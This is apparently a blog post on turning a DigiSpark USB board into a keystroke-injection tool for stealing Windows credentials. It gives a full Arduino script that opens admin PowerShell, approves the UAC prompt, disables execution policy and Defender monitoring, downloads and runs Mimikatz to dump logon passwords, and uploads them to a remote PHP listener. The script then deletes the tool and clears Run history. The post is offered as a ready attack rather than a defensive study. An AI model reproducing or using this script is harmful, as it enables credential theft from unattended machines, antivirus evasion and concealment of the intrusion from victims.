[04] Weaponizing DigiSpark with Mimikatz

What's DigiSpark ?

DigiSpark is one of the smallest Arduino development boards based on an Attiny85 microcontroller. It's built to work on USB's 5V, consists of ~6k flash memory and 6 I/O Pins. The actual charm about it is that it's cheap and affordable, yet powerful enough to run weaponized scripts.


The great plan

Programming the DigiSpark to do a fast and stealth as possible credential theft from the Windows system. It's been imagined as a fast way to access credentials from an unattended system by representing itself as a HID (Human Interface Device / Keyboard).

The process is following:

  1. Run a PowerShell session as Admin
  2. Disable protection for script execution policy
  3. Disable active scanning for Windows Defender
  4. Download and execute MimiKatz to pull creds
  5. Convert the output to a string
  6. Upload the string into PHP listener
  7. Revert AV and policy changes
  8. Clear leftover logs and files
  9. Blink the LED for being done


Setting up software

Since DigiSpark is a microcontroller, it requires and IDE with proper drivers to be programmed.

In this scenario we will be using Ardunio IDE which is available to download at the following link.

After setting it up, extra drivers are required for support on Digispark

  • Head to File - Preferences
  • In the box named "Additional Boards Manager URL" add the following
http://digistump.com/package_digistump_index.json

  • Click OK
  • Head to Tools menu
  • Click Boards Manager which is located in Board submenu
  • Search for DigiStump and install the drivers

Now you're all set!

Connect the DigiSpark, and start uploading Your code from the Arduino IDE.


Script

    1. #include "DigiKeyboard.h" void setup() { pinMode(1, OUTPUT); // on-board led for model A } void loop() { DigiKeyboard.delay(6000); // wait 6 sec before start DigiKeyboard.sendKeyStroke(0); DigiKeyboard.sendKeyStroke(KEY_X, MOD_GUI_LEFT); // Win + X DigiKeyboard.sendKeyStroke(0); DigiKeyboard.delay(100); DigiKeyboard.sendKeyStroke(KEY_A); // Run PowerShell as admin DigiKeyboard.delay(2000); // Delay for laggy PC-s DigiKeyboard.sendKeyStroke(KEY_ARROW_LEFT); // select yes on UAC prompt DigiKeyboard.sendKeyStroke(KEY_ENTER); // confirm the prompt DigiKeyboard.delay(1000); DigiKeyboard.println("Set-ExecutionPolicy Unrestricted"); // Enable running scripts policy DigiKeyboard.delay(1000); DigiKeyboard.println("Set-MpPreference -DisableRealtimeMonitoring $true"); // Disable Windows defender DigiKeyboard.delay(1000); DigiKeyboard.println("cd $ENV:temp"); // Navigate into temp dir DigiKeyboard.delay(1000); DigiKeyboard.println("Invoke-WebRequest -Uri 'https://repo.iskullbox.dev/iskullbox/DigiKatz/raw/branch/master/mimi.exe' -OutFile 'mimi.exe'"); DigiKeyboard.delay(1000); DigiKeyboard.println("./mimi.exe 'sekurlsa::logonpasswords full' >> dump.file"); // Call mimikatz to dump system credentials DigiKeyboard.delay(1000); DigiKeyboard.println("$output = Get-Content dump.file"); //Convert output to string, preupload DigiKeyboard.delay(1000); DigiKeyboard.println("(New-Object Net.WebClient).UploadString('https://test.iskullbox.dev/listener.php', $output)"); //Upload to listener DigiKeyboard.delay(1000); DigiKeyboard.println("Remove-Item mimi.exe"); // Remove mimikatz DigiKeyboard.delay(1000); DigiKeyboard.println("Set-ExecutionPolicy Restricted"); // Revert policy DigiKeyboard.delay(1000); DigiKeyboard.println("Set-MpPreference -DisableRealtimeMonitoring $false"); // Enable Windows defender DigiKeyboard.delay(1000); DigiKeyboard.println("Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"); //Remove RUN prompt history   DigiKeyboard.delay(1000); DigiKeyboard.println("exit"); // Exit PowerShell DigiKeyboard.delay(1000); DigiKeyboard.sendKeyStroke(KEY_ENTER); digitalWrite(1, HIGH); // LED indicator, ready to remove DigiKeyboard.delay(10000); }


I think the code is pretty straightforward and comments are simple, listener script is available at the repository.

This is still in early alpha, so expect a lot of changes to be made.

Bash script for automating install of the server side is still in progress. 
Thanks for reading!

rubberducky, digispark, arduino, mimikatz